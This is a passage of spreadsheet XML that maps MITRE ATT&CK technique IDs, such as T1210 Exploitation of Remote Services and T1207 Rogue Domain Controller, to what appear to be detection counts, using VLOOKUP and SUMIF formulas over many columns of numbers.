      <c r="CE37" s="12">
        <v>0</v>
      </c>
      <c r="CF37" s="12">
        <v>1</v>
      </c>
      <c r="CG37" s="13">
        <v>1</v>
      </c>
      <c r="CH37" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="4">
        <f t="shared" si="0"/>
        <v>36</v>
      </c>
      <c r="B38" s="4" t="str">
        <f>IFERROR(VLOOKUP(A38,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1203</v>
      </c>
      <c r="C38" s="493" t="str">
        <f>IFERROR(VLOOKUP(B38,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="D38" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B38)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E38" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>116</v>
      </c>
      <c r="F38" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (116)</v>
      </c>
      <c r="G38" s="292">
        <v>1</v>
      </c>
      <c r="H38" s="322">
        <v>1</v>
      </c>
      <c r="I38" s="322">
        <v>0</v>
      </c>
      <c r="J38" s="12">
        <v>1</v>
      </c>
      <c r="K38" s="13">
        <v>1</v>
      </c>
      <c r="L38" s="394">
        <v>1</v>
      </c>
      <c r="M38" s="322">
        <v>5505</v>
      </c>
      <c r="N38" s="322">
        <v>112</v>
      </c>
      <c r="O38" s="322">
        <v>0</v>
      </c>
      <c r="P38" s="12">
        <v>1</v>
      </c>
      <c r="Q38" s="13">
        <v>1</v>
      </c>
      <c r="R38" s="394">
        <v>112</v>
      </c>
      <c r="S38" s="292">
        <v>5506</v>
      </c>
      <c r="T38" s="322">
        <v>113</v>
      </c>
      <c r="U38" s="322">
        <v>0</v>
      </c>
      <c r="V38" s="12">
        <v>2</v>
      </c>
      <c r="W38" s="13">
        <v>1</v>
      </c>
      <c r="X38" s="394">
        <v>112</v>
      </c>
      <c r="Y38" s="392">
        <v>16570</v>
      </c>
      <c r="Z38" s="392">
        <v>233</v>
      </c>
      <c r="AA38" s="322">
        <v>0</v>
      </c>
      <c r="AB38" s="392">
        <v>5</v>
      </c>
      <c r="AC38" s="16">
        <v>1</v>
      </c>
      <c r="AD38" s="394">
        <v>116</v>
      </c>
      <c r="AE38" s="392">
        <v>5528</v>
      </c>
      <c r="AF38" s="392">
        <v>135</v>
      </c>
      <c r="AG38" s="322">
        <v>0</v>
      </c>
      <c r="AH38" s="392">
        <v>3</v>
      </c>
      <c r="AI38" s="16">
        <v>1</v>
      </c>
      <c r="AJ38" s="394">
        <v>112</v>
      </c>
      <c r="AK38" s="392">
        <v>22098</v>
      </c>
      <c r="AL38" s="392">
        <v>368</v>
      </c>
      <c r="AM38" s="322">
        <v>0</v>
      </c>
      <c r="AN38" s="392">
        <v>8</v>
      </c>
      <c r="AO38" s="16">
        <v>1</v>
      </c>
      <c r="AP38" s="394">
        <v>116</v>
      </c>
      <c r="AQ38" s="292">
        <v>0</v>
      </c>
      <c r="AR38" s="322">
        <v>0</v>
      </c>
      <c r="AS38" s="322">
        <v>0</v>
      </c>
      <c r="AT38" s="12">
        <v>0</v>
      </c>
      <c r="AU38" s="13">
        <v>0</v>
      </c>
      <c r="AV38" s="394">
        <v>0</v>
      </c>
      <c r="AW38" s="392">
        <v>0</v>
      </c>
      <c r="AX38" s="392">
        <v>0</v>
      </c>
      <c r="AY38" s="322">
        <v>0</v>
      </c>
      <c r="AZ38" s="4">
        <v>0</v>
      </c>
      <c r="BA38" s="16">
        <v>0</v>
      </c>
      <c r="BB38" s="394">
        <v>0</v>
      </c>
      <c r="BC38" s="292">
        <v>5506</v>
      </c>
      <c r="BD38" s="322">
        <v>113</v>
      </c>
      <c r="BE38" s="322">
        <v>0</v>
      </c>
      <c r="BF38" s="12">
        <v>2</v>
      </c>
      <c r="BG38" s="13">
        <v>1</v>
      </c>
      <c r="BH38" s="394">
        <v>112</v>
      </c>
      <c r="BI38" s="292">
        <v>224</v>
      </c>
      <c r="BJ38" s="322">
        <v>112</v>
      </c>
      <c r="BK38" s="322">
        <v>0</v>
      </c>
      <c r="BL38" s="12">
        <v>1</v>
      </c>
      <c r="BM38" s="13">
        <v>1</v>
      </c>
      <c r="BN38" s="394">
        <v>112</v>
      </c>
      <c r="BO38" s="292">
        <v>454</v>
      </c>
      <c r="BP38" s="322">
        <v>342</v>
      </c>
      <c r="BQ38" s="322">
        <v>0</v>
      </c>
      <c r="BR38" s="12">
        <v>1</v>
      </c>
      <c r="BS38" s="12">
        <v>2</v>
      </c>
      <c r="BT38" s="13">
        <v>1</v>
      </c>
      <c r="BU38" s="394">
        <v>115</v>
      </c>
      <c r="BV38" s="292">
        <v>56</v>
      </c>
      <c r="BW38" s="322">
        <v>56</v>
      </c>
      <c r="BX38" s="322">
        <v>0</v>
      </c>
      <c r="BY38" s="12">
        <v>2</v>
      </c>
      <c r="BZ38" s="13">
        <v>1</v>
      </c>
      <c r="CA38" s="394">
        <v>28</v>
      </c>
      <c r="CB38" s="292">
        <v>269</v>
      </c>
      <c r="CC38" s="322">
        <v>168</v>
      </c>
      <c r="CD38" s="322">
        <v>0</v>
      </c>
      <c r="CE38" s="12">
        <v>2</v>
      </c>
      <c r="CF38" s="12">
        <v>1</v>
      </c>
      <c r="CG38" s="13">
        <v>1</v>
      </c>
      <c r="CH38" s="394">
        <v>112</v>
      </c>
    </row>
    <row r="39" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4">
        <f t="shared" si="0"/>
        <v>37</v>
      </c>
      <c r="B39" s="4" t="str">
        <f>IFERROR(VLOOKUP(A39,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1204</v>
      </c>
      <c r="C39" s="493" t="str">
        <f>IFERROR(VLOOKUP(B39,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>User Execution</v>
      </c>
      <c r="D39" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B39)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E39" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F39" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="G39" s="292">
        <v>0</v>
      </c>
      <c r="H39" s="322">
        <v>0</v>
      </c>
      <c r="I39" s="322">
        <v>0</v>
      </c>
      <c r="J39" s="12">
        <v>0</v>
      </c>
      <c r="K39" s="13">
        <v>0</v>
      </c>
      <c r="L39" s="394">
        <v>0</v>
      </c>
      <c r="M39" s="322">
        <v>0</v>
      </c>
      <c r="N39" s="322">
        <v>0</v>
      </c>
      <c r="O39" s="322">
        <v>0</v>
      </c>
      <c r="P39" s="12">
        <v>0</v>
      </c>
      <c r="Q39" s="13">
        <v>0</v>
      </c>
      <c r="R39" s="394">
        <v>0</v>
      </c>
      <c r="S39" s="292">
        <v>0</v>
      </c>
      <c r="T39" s="322">
        <v>0</v>
      </c>
      <c r="U39" s="322">
        <v>0</v>
      </c>
      <c r="V39" s="12">
        <v>0</v>
      </c>
      <c r="W39" s="13">
        <v>0</v>
      </c>
      <c r="X39" s="394">
        <v>0</v>
      </c>
      <c r="Y39" s="392">
        <v>0</v>
      </c>
      <c r="Z39" s="392">
        <v>0</v>
      </c>
      <c r="AA39" s="322">
        <v>0</v>
      </c>
      <c r="AB39" s="392">
        <v>0</v>
      </c>
      <c r="AC39" s="16">
        <v>0</v>
      </c>
      <c r="AD39" s="394">
        <v>0</v>
      </c>
      <c r="AE39" s="392">
        <v>4</v>
      </c>
      <c r="AF39" s="392">
        <v>2</v>
      </c>
      <c r="AG39" s="322">
        <v>0</v>
      </c>
      <c r="AH39" s="392">
        <v>2</v>
      </c>
      <c r="AI39" s="16">
        <v>1</v>
      </c>
      <c r="AJ39" s="394">
        <v>1</v>
      </c>
      <c r="AK39" s="392">
        <v>4</v>
      </c>
      <c r="AL39" s="392">
        <v>2</v>
      </c>
      <c r="AM39" s="322">
        <v>0</v>
      </c>
      <c r="AN39" s="392">
        <v>2</v>
      </c>
      <c r="AO39" s="16">
        <v>1</v>
      </c>
      <c r="AP39" s="394">
        <v>1</v>
      </c>
      <c r="AQ39" s="292">
        <v>0</v>
      </c>
      <c r="AR39" s="322">
        <v>0</v>
      </c>
      <c r="AS39" s="322">
        <v>0</v>
      </c>
      <c r="AT39" s="12">
        <v>0</v>
      </c>
      <c r="AU39" s="13">
        <v>0</v>
      </c>
      <c r="AV39" s="394">
        <v>0</v>
      </c>
      <c r="AW39" s="392">
        <v>0</v>
      </c>
      <c r="AX39" s="392">
        <v>0</v>
      </c>
      <c r="AY39" s="322">
        <v>0</v>
      </c>
      <c r="AZ39" s="4">
        <v>0</v>
      </c>
      <c r="BA39" s="16">
        <v>0</v>
      </c>
      <c r="BB39" s="394">
        <v>0</v>
      </c>
      <c r="BC39" s="292">
        <v>0</v>
      </c>
      <c r="BD39" s="322">
        <v>0</v>
      </c>
      <c r="BE39" s="322">
        <v>0</v>
      </c>
      <c r="BF39" s="12">
        <v>0</v>
      </c>
      <c r="BG39" s="13">
        <v>0</v>
      </c>
      <c r="BH39" s="394">
        <v>0</v>
      </c>
      <c r="BI39" s="292">
        <v>0</v>
      </c>
      <c r="BJ39" s="322">
        <v>0</v>
      </c>
      <c r="BK39" s="322">
        <v>0</v>
      </c>
      <c r="BL39" s="12">
        <v>0</v>
      </c>
      <c r="BM39" s="13">
        <v>0</v>
      </c>
      <c r="BN39" s="394">
        <v>0</v>
      </c>
      <c r="BO39" s="292">
        <v>0</v>
      </c>
      <c r="BP39" s="322">
        <v>0</v>
      </c>
      <c r="BQ39" s="322">
        <v>0</v>
      </c>
      <c r="BR39" s="12">
        <v>0</v>
      </c>
      <c r="BS39" s="12">
        <v>0</v>
      </c>
      <c r="BT39" s="13">
        <v>0</v>
      </c>
      <c r="BU39" s="394">
        <v>0</v>
      </c>
      <c r="BV39" s="292">
        <v>0</v>
      </c>
      <c r="BW39" s="322">
        <v>0</v>
      </c>
      <c r="BX39" s="322">
        <v>0</v>
      </c>
      <c r="BY39" s="12">
        <v>0</v>
      </c>
      <c r="BZ39" s="13">
        <v>0</v>
      </c>
      <c r="CA39" s="394">
        <v>0</v>
      </c>
      <c r="CB39" s="292">
        <v>0</v>
      </c>
      <c r="CC39" s="322">
        <v>0</v>
      </c>
      <c r="CD39" s="322">
        <v>0</v>
      </c>
      <c r="CE39" s="12">
        <v>0</v>
      </c>
      <c r="CF39" s="12">
        <v>0</v>
      </c>
      <c r="CG39" s="13">
        <v>0</v>
      </c>
      <c r="CH39" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="4">
        <f t="shared" si="0"/>
        <v>38</v>
      </c>
      <c r="B40" s="4" t="str">
        <f>IFERROR(VLOOKUP(A40,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1205</v>
      </c>
      <c r="C40" s="493" t="str">
        <f>IFERROR(VLOOKUP(B40,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="D40" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B40)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E40" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F40" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (5)</v>
      </c>
      <c r="G40" s="292">
        <v>2</v>
      </c>
      <c r="H40" s="322">
        <v>1</v>
      </c>
      <c r="I40" s="322">
        <v>0</v>
      </c>
      <c r="J40" s="12">
        <v>1</v>
      </c>
      <c r="K40" s="13">
        <v>1</v>
      </c>
      <c r="L40" s="394">
        <v>1</v>
      </c>
      <c r="M40" s="322">
        <v>0</v>
      </c>
      <c r="N40" s="322">
        <v>0</v>
      </c>
      <c r="O40" s="322">
        <v>0</v>
      </c>
      <c r="P40" s="12">
        <v>0</v>
      </c>
      <c r="Q40" s="13">
        <v>0</v>
      </c>
      <c r="R40" s="394">
        <v>0</v>
      </c>
      <c r="S40" s="292">
        <v>2</v>
      </c>
      <c r="T40" s="322">
        <v>1</v>
      </c>
      <c r="U40" s="322">
        <v>0</v>
      </c>
      <c r="V40" s="12">
        <v>1</v>
      </c>
      <c r="W40" s="13">
        <v>1</v>
      </c>
      <c r="X40" s="394">
        <v>1</v>
      </c>
      <c r="Y40" s="392">
        <v>3</v>
      </c>
      <c r="Z40" s="392">
        <v>2</v>
      </c>
      <c r="AA40" s="322">
        <v>0</v>
      </c>
      <c r="AB40" s="392">
        <v>2</v>
      </c>
      <c r="AC40" s="16">
        <v>1</v>
      </c>
      <c r="AD40" s="394">
        <v>1</v>
      </c>
      <c r="AE40" s="392">
        <v>4</v>
      </c>
      <c r="AF40" s="392">
        <v>4</v>
      </c>
      <c r="AG40" s="322">
        <v>0</v>
      </c>
      <c r="AH40" s="392">
        <v>2</v>
      </c>
      <c r="AI40" s="16">
        <v>1</v>
      </c>
      <c r="AJ40" s="394">
        <v>2</v>
      </c>
      <c r="AK40" s="392">
        <v>7</v>
      </c>
      <c r="AL40" s="392">
        <v>6</v>
      </c>
      <c r="AM40" s="322">
        <v>0</v>
      </c>
      <c r="AN40" s="392">
        <v>4</v>
      </c>
      <c r="AO40" s="16">
        <v>1</v>
      </c>
      <c r="AP40" s="394">
        <v>2</v>
      </c>
      <c r="AQ40" s="292">
        <v>0</v>
      </c>
      <c r="AR40" s="322">
        <v>0</v>
      </c>
      <c r="AS40" s="322">
        <v>0</v>
      </c>
      <c r="AT40" s="12">
        <v>0</v>
      </c>
      <c r="AU40" s="13">
        <v>0</v>
      </c>
      <c r="AV40" s="394">
        <v>0</v>
      </c>
      <c r="AW40" s="392">
        <v>1</v>
      </c>
      <c r="AX40" s="392">
        <v>1</v>
      </c>
      <c r="AY40" s="322">
        <v>0</v>
      </c>
      <c r="AZ40" s="4">
        <v>1</v>
      </c>
      <c r="BA40" s="16">
        <v>1</v>
      </c>
      <c r="BB40" s="394">
        <v>1</v>
      </c>
      <c r="BC40" s="292">
        <v>3</v>
      </c>
      <c r="BD40" s="322">
        <v>2</v>
      </c>
      <c r="BE40" s="322">
        <v>0</v>
      </c>
      <c r="BF40" s="12">
        <v>2</v>
      </c>
      <c r="BG40" s="13">
        <v>1</v>
      </c>
      <c r="BH40" s="394">
        <v>1</v>
      </c>
      <c r="BI40" s="292">
        <v>1</v>
      </c>
      <c r="BJ40" s="322">
        <v>1</v>
      </c>
      <c r="BK40" s="322">
        <v>0</v>
      </c>
      <c r="BL40" s="12">
        <v>1</v>
      </c>
      <c r="BM40" s="13">
        <v>1</v>
      </c>
      <c r="BN40" s="394">
        <v>1</v>
      </c>
      <c r="BO40" s="292">
        <v>3</v>
      </c>
      <c r="BP40" s="322">
        <v>3</v>
      </c>
      <c r="BQ40" s="322">
        <v>0</v>
      </c>
      <c r="BR40" s="12">
        <v>1</v>
      </c>
      <c r="BS40" s="12">
        <v>2</v>
      </c>
      <c r="BT40" s="13">
        <v>1</v>
      </c>
      <c r="BU40" s="394">
        <v>1</v>
      </c>
      <c r="BV40" s="292">
        <v>0</v>
      </c>
      <c r="BW40" s="322">
        <v>0</v>
      </c>
      <c r="BX40" s="322">
        <v>0</v>
      </c>
      <c r="BY40" s="12">
        <v>0</v>
      </c>
      <c r="BZ40" s="13">
        <v>0</v>
      </c>
      <c r="CA40" s="394">
        <v>0</v>
      </c>
      <c r="CB40" s="292">
        <v>1</v>
      </c>
      <c r="CC40" s="322">
        <v>1</v>
      </c>
      <c r="CD40" s="322">
        <v>0</v>
      </c>
      <c r="CE40" s="12">
        <v>0</v>
      </c>
      <c r="CF40" s="12">
        <v>1</v>
      </c>
      <c r="CG40" s="13">
        <v>1</v>
      </c>
      <c r="CH40" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4">
        <f t="shared" si="0"/>
        <v>39</v>
      </c>
      <c r="B41" s="4" t="str">
        <f>IFERROR(VLOOKUP(A41,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1207</v>
      </c>
      <c r="C41" s="493" t="str">
        <f>IFERROR(VLOOKUP(B41,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="D41" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B41)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E41" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>88</v>
      </c>
      <c r="F41" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (88)</v>
      </c>
      <c r="G41" s="292">
        <v>62</v>
      </c>
      <c r="H41" s="322">
        <v>58</v>
      </c>
      <c r="I41" s="322">
        <v>0</v>
      </c>
      <c r="J41" s="12">
        <v>4</v>
      </c>
      <c r="K41" s="13">
        <v>1</v>
      </c>
      <c r="L41" s="394">
        <v>33</v>
      </c>
      <c r="M41" s="322">
        <v>0</v>
      </c>
      <c r="N41" s="322">
        <v>0</v>
      </c>
      <c r="O41" s="322">
        <v>0</v>
      </c>
      <c r="P41" s="12">
        <v>0</v>
      </c>
      <c r="Q41" s="13">
        <v>0</v>
      </c>
      <c r="R41" s="394">
        <v>0</v>
      </c>
      <c r="S41" s="292">
        <v>62</v>
      </c>
      <c r="T41" s="322">
        <v>58</v>
      </c>
      <c r="U41" s="322">
        <v>0</v>
      </c>
      <c r="V41" s="12">
        <v>4</v>
      </c>
      <c r="W41" s="13">
        <v>1</v>
      </c>
      <c r="X41" s="394">
        <v>33</v>
      </c>
      <c r="Y41" s="392">
        <v>94</v>
      </c>
      <c r="Z41" s="392">
        <v>80</v>
      </c>
      <c r="AA41" s="322">
        <v>0</v>
      </c>
      <c r="AB41" s="392">
        <v>6</v>
      </c>
      <c r="AC41" s="16">
        <v>1</v>
      </c>
      <c r="AD41" s="394">
        <v>47</v>
      </c>
      <c r="AE41" s="392">
        <v>12</v>
      </c>
      <c r="AF41" s="392">
        <v>10</v>
      </c>
      <c r="AG41" s="322">
        <v>0</v>
      </c>
      <c r="AH41" s="392">
        <v>10</v>
      </c>
      <c r="AI41" s="16">
        <v>1</v>
      </c>
      <c r="AJ41" s="394">
        <v>3</v>
      </c>
      <c r="AK41" s="392">
        <v>106</v>
      </c>
      <c r="AL41" s="392">
        <v>90</v>
      </c>
      <c r="AM41" s="322">
        <v>0</v>
      </c>
      <c r="AN41" s="392">
        <v>16</v>
      </c>
      <c r="AO41" s="16">
        <v>1</v>
      </c>
      <c r="AP41" s="394">
        <v>48</v>
      </c>
      <c r="AQ41" s="292">
        <v>0</v>
      </c>
      <c r="AR41" s="322">
        <v>0</v>
      </c>
      <c r="AS41" s="322">
        <v>0</v>
      </c>
      <c r="AT41" s="12">
        <v>0</v>
      </c>
      <c r="AU41" s="13">
        <v>0</v>
      </c>
      <c r="AV41" s="394">
        <v>0</v>
      </c>
      <c r="AW41" s="392">
        <v>0</v>
      </c>
      <c r="AX41" s="392">
        <v>0</v>
      </c>
      <c r="AY41" s="322">
        <v>0</v>
      </c>
      <c r="AZ41" s="4">
        <v>0</v>
      </c>
      <c r="BA41" s="16">
        <v>0</v>
      </c>
      <c r="BB41" s="394">
        <v>0</v>
      </c>
      <c r="BC41" s="292">
        <v>62</v>
      </c>
      <c r="BD41" s="322">
        <v>58</v>
      </c>
      <c r="BE41" s="322">
        <v>0</v>
      </c>
      <c r="BF41" s="12">
        <v>4</v>
      </c>
      <c r="BG41" s="13">
        <v>1</v>
      </c>
      <c r="BH41" s="394">
        <v>33</v>
      </c>
      <c r="BI41" s="292">
        <v>0</v>
      </c>
      <c r="BJ41" s="322">
        <v>0</v>
      </c>
      <c r="BK41" s="322">
        <v>0</v>
      </c>
      <c r="BL41" s="12">
        <v>0</v>
      </c>
      <c r="BM41" s="13">
        <v>0</v>
      </c>
      <c r="BN41" s="394">
        <v>0</v>
      </c>
      <c r="BO41" s="292">
        <v>75</v>
      </c>
      <c r="BP41" s="322">
        <v>75</v>
      </c>
      <c r="BQ41" s="322">
        <v>0</v>
      </c>
      <c r="BR41" s="12">
        <v>0</v>
      </c>
      <c r="BS41" s="12">
        <v>8</v>
      </c>
      <c r="BT41" s="13">
        <v>1</v>
      </c>
      <c r="BU41" s="394">
        <v>73</v>
      </c>
      <c r="BV41" s="292">
        <v>0</v>
      </c>
      <c r="BW41" s="322">
        <v>0</v>
      </c>
      <c r="BX41" s="322">
        <v>0</v>
      </c>
      <c r="BY41" s="12">
        <v>0</v>
      </c>
      <c r="BZ41" s="13">
        <v>0</v>
      </c>
      <c r="CA41" s="394">
        <v>0</v>
      </c>
      <c r="CB41" s="292">
        <v>8</v>
      </c>
      <c r="CC41" s="322">
        <v>7</v>
      </c>
      <c r="CD41" s="322">
        <v>0</v>
      </c>
      <c r="CE41" s="12">
        <v>0</v>
      </c>
      <c r="CF41" s="12">
        <v>2</v>
      </c>
      <c r="CG41" s="13">
        <v>1</v>
      </c>
      <c r="CH41" s="394">
        <v>7</v>
      </c>
    </row>
    <row r="42" spans="1:86" ht="15" customHeight="1">
      <c r="A42" s="4">
        <f t="shared" si="0"/>
        <v>40</v>
      </c>
      <c r="B42" s="4" t="str">
        <f>IFERROR(VLOOKUP(A42,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1210</v>
      </c>
      <c r="C42" s="493" t="str">
        <f>IFERROR(VLOOKUP(B42,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="D42" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B42)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E42" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>287</v>
      </c>
      <c r="F42" s="579" t="str">
        <f t="shared" si="1"/>
        <v>3 (287)</v>
      </c>
      <c r="G42" s="292">
        <v>33</v>
      </c>
      <c r="H42" s="322">
        <v>10</v>
      </c>
      <c r="I42" s="322">
        <v>0</v>
      </c>
      <c r="J42" s="12">
        <v>5</v>
      </c>
      <c r="K42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="L42" s="394">
        <v>5</v>
      </c>
      <c r="M42" s="322">
        <v>10</v>
      </c>
      <c r="N42" s="322">
        <v>9</v>
      </c>
      <c r="O42" s="322">
        <v>0</v>
      </c>
      <c r="P42" s="12">
        <v>8</v>
      </c>
      <c r="Q42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="R42" s="394">
        <v>3</v>
      </c>
      <c r="S42" s="292">
        <v>43</v>
      </c>
      <c r="T42" s="322">
        <v>19</v>
      </c>
      <c r="U42" s="322">
        <v>0</v>
      </c>
      <c r="V42" s="12">
        <v>13</v>
      </c>
      <c r="W42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="X42" s="394">
        <v>5</v>
      </c>
      <c r="Y42" s="392">
        <v>26266</v>
      </c>
      <c r="Z42" s="392">
        <v>795</v>
      </c>
      <c r="AA42" s="322">
        <v>0</v>
      </c>
      <c r="AB42" s="392">
        <v>18</v>
      </c>
      <c r="AC42" s="16">
        <v>1</v>
      </c>
      <c r="AD42" s="394">
        <v>265</v>
      </c>
      <c r="AE42" s="392">
        <v>6603</v>
      </c>
      <c r="AF42" s="392">
        <v>304</v>
      </c>
      <c r="AG42" s="322">
        <v>0</v>
      </c>
      <c r="AH42" s="392">
        <v>20</v>
      </c>
      <c r="AI42" s="16">
        <v>1</v>
      </c>
      <c r="AJ42" s="394">
        <v>264</v>
      </c>
      <c r="AK42" s="392">
        <v>32869</v>
      </c>
      <c r="AL42" s="392">
        <v>1099</v>
      </c>
      <c r="AM42" s="322">
        <v>0</v>
      </c>
      <c r="AN42" s="392">
        <v>38</v>
      </c>
      <c r="AO42" s="16">
        <v>1</v>
      </c>
      <c r="AP42" s="394">
        <v>266</v>
      </c>
      <c r="AQ42" s="292">
        <v>16</v>
      </c>
      <c r="AR42" s="322">
        <v>2</v>
      </c>
      <c r="AS42" s="322">
        <v>0</v>
      </c>
      <c r="AT42" s="12">
        <v>2</v>
      </c>
      <c r="AU42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="AV42" s="394">
        <v>1</v>
      </c>
      <c r="AW42" s="392">
        <v>29</v>
      </c>
      <c r="AX42" s="392">
        <v>3</v>
      </c>
      <c r="AY42" s="322">
        <v>0</v>
      </c>
      <c r="AZ42" s="4">
        <v>3</v>
      </c>
      <c r="BA42" s="16">
        <v>0.33333333333333331</v>
      </c>
      <c r="BB42" s="394">
        <v>1</v>
      </c>
      <c r="BC42" s="292">
        <v>56</v>
      </c>
      <c r="BD42" s="322">
        <v>20</v>
      </c>
      <c r="BE42" s="322">
        <v>0</v>
      </c>
      <c r="BF42" s="12">
        <v>14</v>
      </c>
      <c r="BG42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BH42" s="394">
        <v>5</v>
      </c>
      <c r="BI42" s="292">
        <v>7</v>
      </c>
      <c r="BJ42" s="322">
        <v>5</v>
      </c>
      <c r="BK42" s="322">
        <v>0</v>
      </c>
      <c r="BL42" s="12">
        <v>5</v>
      </c>
      <c r="BM42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN42" s="394">
        <v>4</v>
      </c>
      <c r="BO42" s="292">
        <v>552</v>
      </c>
      <c r="BP42" s="322">
        <v>550</v>
      </c>
      <c r="BQ42" s="322">
        <v>0</v>
      </c>
      <c r="BR42" s="12">
        <v>5</v>
      </c>
      <c r="BS42" s="12">
        <v>8</v>
      </c>
      <c r="BT42" s="13">
        <v>1</v>
      </c>
      <c r="BU42" s="394">
        <v>283</v>
      </c>
      <c r="BV42" s="292">
        <v>4</v>
      </c>
      <c r="BW42" s="322">
        <v>3</v>
      </c>
      <c r="BX42" s="322">
        <v>0</v>
      </c>
      <c r="BY42" s="12">
        <v>3</v>
      </c>
      <c r="BZ42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA42" s="394">
        <v>3</v>
      </c>
      <c r="CB42" s="292">
        <v>12934</v>
      </c>
      <c r="CC42" s="322">
        <v>264</v>
      </c>
      <c r="CD42" s="322">
        <v>0</v>
      </c>
      <c r="CE42" s="12">
        <v>3</v>
      </c>
      <c r="CF42" s="12">
        <v>3</v>
      </c>
      <c r="CG42" s="13">
        <v>1</v>
      </c>
      <c r="CH42" s="394">
        <v>262</v>
      </c>
    </row>
    <row r="43" spans="1:86" ht="15" customHeight="1">
      <c r="A43" s="4">
        <f t="shared" si="0"/>
        <v>41</v>
      </c>
      <c r="B43" s="4" t="str">
        <f>IFERROR(VLOOKUP(A43,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1218</v>
      </c>
      <c r="C43" s="493" t="str">
        <f>IFERROR(VLOOKUP(B43,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Binary Proxy Execution</v>
      </c>
      <c r="D43" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B43)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E43" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F43" s="579" t="str">
        <f t="shared" si="1"/>
        <v>1 (2)</v>
      </c>
      <c r="G43" s="292">
        <v>3</v>
      </c>
      <c r="H43" s="322">
        <v>3</v>
      </c>
      <c r="I43" s="322">
        <v>0</v>
      </c>
      <c r="J43" s="12">
        <v>3</v>
      </c>
      <c r="K43" s="13">
        <v>1</v>
      </c>
      <c r="L43" s="394">
        <v>1</v>
      </c>
      <c r="M43" s="322">
        <v>0</v>
      </c>
      <c r="N43" s="322">
        <v>0</v>
      </c>
      <c r="O43" s="322">
        <v>0</v>
      </c>
      <c r="P43" s="12">
        <v>0</v>
      </c>
      <c r="Q43" s="13">
        <v>0</v>
      </c>
      <c r="R43" s="394">
        <v>0</v>
      </c>
